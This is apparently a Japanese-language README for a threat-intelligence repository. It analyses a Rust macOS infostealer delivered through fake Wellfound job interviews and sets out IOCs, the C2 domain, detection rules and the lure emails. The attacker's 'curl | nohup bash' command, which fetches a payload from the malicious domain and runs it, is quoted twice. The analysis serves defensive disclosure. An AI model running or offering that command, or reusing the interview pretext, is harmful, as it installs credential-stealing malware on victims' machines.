
HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー
脅威インテリジェンス: Rust製のmacOSユニバーサルバイナリのインフォスティーラーで、Wellfound(旧AngelList)上の偽の求人面接パイプラインを通じて配布されました。オペレーターのペルソナ「HyperHive」の「Felix」が、ターゲットに
macos.hyperhives.netからの悪意のあるインストーラーを実行するよう誘導しました。このリポジトリは完全な静的解析を文書化しており、571個の暗号化された設定値(C2 URL、Sentry DSN、**276個の標的とされたChrome拡張機能IDを含む)が復元されています。
| サンプルSHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2ドメイン | cloudproxy.link |
| 配布ドメイン | macos.hyperhives.net |
| 誘引プラットフォーム | Wellfound(旧AngelList) |
| オペレーターペルソナ | 「HyperHive」の「Felix」 |
| VirusTotal | 9 / 63 検出 |
| 分類 | 公開開示 / IOCバンドル |
| 最終更新 | 2026年4月 |
| ファイル | 形式 | 目的 |
|---|---|---|
iocs.txt | プレーンテキスト | ハッシュ, ドメイン, URL, IP, メール, Sentry ID — ブロックリスト, MISP, OpenCTIに貼り付け |
yara_rules.yar | YARA 4.2+ | 既知のサンプルハッシュマッチ + Mach-O用ヒューリスティック文字列検出 |
sigma_rules.yml | Sigma | プロキシ, DNS, プロセス作成ルール — SIEMに合わせてlogsourceを調整 |
stix/bundle.json | STIX 2.1 | 指標, マルウェアSDO, インフラ, ATT&CKパターン, 関係性を含む機械可読CTIバンドル |
attack-navigator-layer.json | ATT&CK Navigator | 視覚的なテクニックカバレッジのために[ATT&CK Navigator]にインポート(https://mitre-attack.github.io/attack-navigator/) |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## クイックスタート
サンプルを `sample/installer_binary` として配置します(ハッシュ検証については[`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)を参照)、その後:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
composeファイルは network_mode: none, read_only: true を強制し、すべてのLinuxケーパビリティを削除します。完全な取り扱いガイドラインについては SECURITY.md を参照してください。
Wellfound(旧AngelList)の求人投稿が、オペレーターのペルソナ "Felix"("HyperHive")による複数メールのソーシャルエンジニアリング連鎖を引き起こしました。ターゲットの技術的背景を褒め称え、偽の面接を設定した後、攻撃者は被害者に hyperhives.net の「製品を確認する」ように指示し、特に Settings → Diagnostics → Log を調べるよう指示しました。これは次の実行を引き起こすための口実です:```
curl -s https://macos.hyperhives.net/install | nohup bash &
ペイロードは、Rustでコンパイルされた**8.5 MBのMach-Oユニバーサルバイナリ**(x86_64 + arm64)です。エアギャップされたDockerラボと**570個のユニークなx86_64ヘルパールーチン**のCPUエミュレーションによる静的解析により、**すべての571個の暗号化された設定値**が復元され、以下が明らかになりました:
- **C2:** `cloudproxy.link` — 4つのHTTPSエンドポイント
- **Sentry(属性のピボット):** `ingest.de.sentry.io`上の組織/プロジェクトIDを含む完全なDSN
- **ビルドの識別:** Cargoユーザー `rootr`、コードネーム `force`、バージョン `9.12.1`
- **ターゲット:** 276個のChrome拡張機能ID(暗号通貨ウォレット、パスワードマネージャー、企業認証情報)
戦術は**DPRK関連のContagious Interview**キャンペーンと一致しています — 正当なプラットフォームでの偽の求人、多段階の信頼構築、`curl | bash`による配信、Rust macOSスティーラー、暗号資産に焦点を当てた流出。
---
## 1 — 始まりの経緯
### 誘餌: Wellfoundでの偽の面接
攻撃は、**Wellfound**(旧AngelList)での**正当に見える求人情報**から始まりました。標的が応募した後、ペルソナ**「Felix」**と会社名**「HyperHive」**を使用するオペレーターからの以下のメールのやり取りが続きました:
**Email 1**(2026年4月4日) — 最初の連絡。「Felix」は標的の履歴書とLinkedInを確認し、自分たちの「Tech Lead」が先に進めることを承認したと述べ、標的の実際の技術経験に具体的に言及しました。メールでは、HyperHiveが「さまざまなオペレーティングシステム向けにHyperhivesのデスクトップ版を構築している」と述べ、UTC+0での面接の日程調整を招待しました。
**Email 2**(2026年4月5日) — フォローアップの日程調整。特定の面接枠(4月8日15:00 UTC)を提案し、重要なペイロード配信の指示が含まれていました:
> *"可能であれば、**設定 → 診断 → ログ**にある製品ログも簡単にご確認ください。ログやその他気づいた製品の観察事項について簡単なコメントを求めさせていただく場合があります。これは、エンジニアリングの経験と細部への注意力を測る良い指標となることが多いためです。"*
これにより、標的は`https://hyperhives.net`に誘導され、診断セクションに移動すると以下がトリガーされました:```
curl -s https://macos.hyperhives.net/install | nohup bash &
コマンドは8.5 MBのMach-Oユニバーサルバイナリをダウンロードして実行しました。AppleScriptを介して偽のmacOSパスワードダイアログが表示されました。パスワードは入力されませんでした。 プロセスは直ちに終了され、サンプルは分析のために保存されました。
| 要素 | 詳細 |
|---|---|
| プラットフォーム | Wellfound (AngelList) — 正規の求人ボード |
| 会社名 | "HyperHive" (単数形) / ドメイン hyperhives.net |
| ペルソナ | "Felix" |
| 連絡先メール | [email protected] |
| 信頼構築 | 対象者の実際の履歴書、LinkedIn、特定の技術スキルを参照 |
| 口実 | "面接前に製品を確認してください" |
| ペイロード発動条件 | hyperhives.net で "設定 → 診断 → ログ" を確認 |
| スケジュール設定 | 偽の面接枠 (4月8日 15:00 UTC) で緊急性を維持 |
| マルチステップチェーン | ペイロード配信前に少なくとも2日間にわたる2通のメール |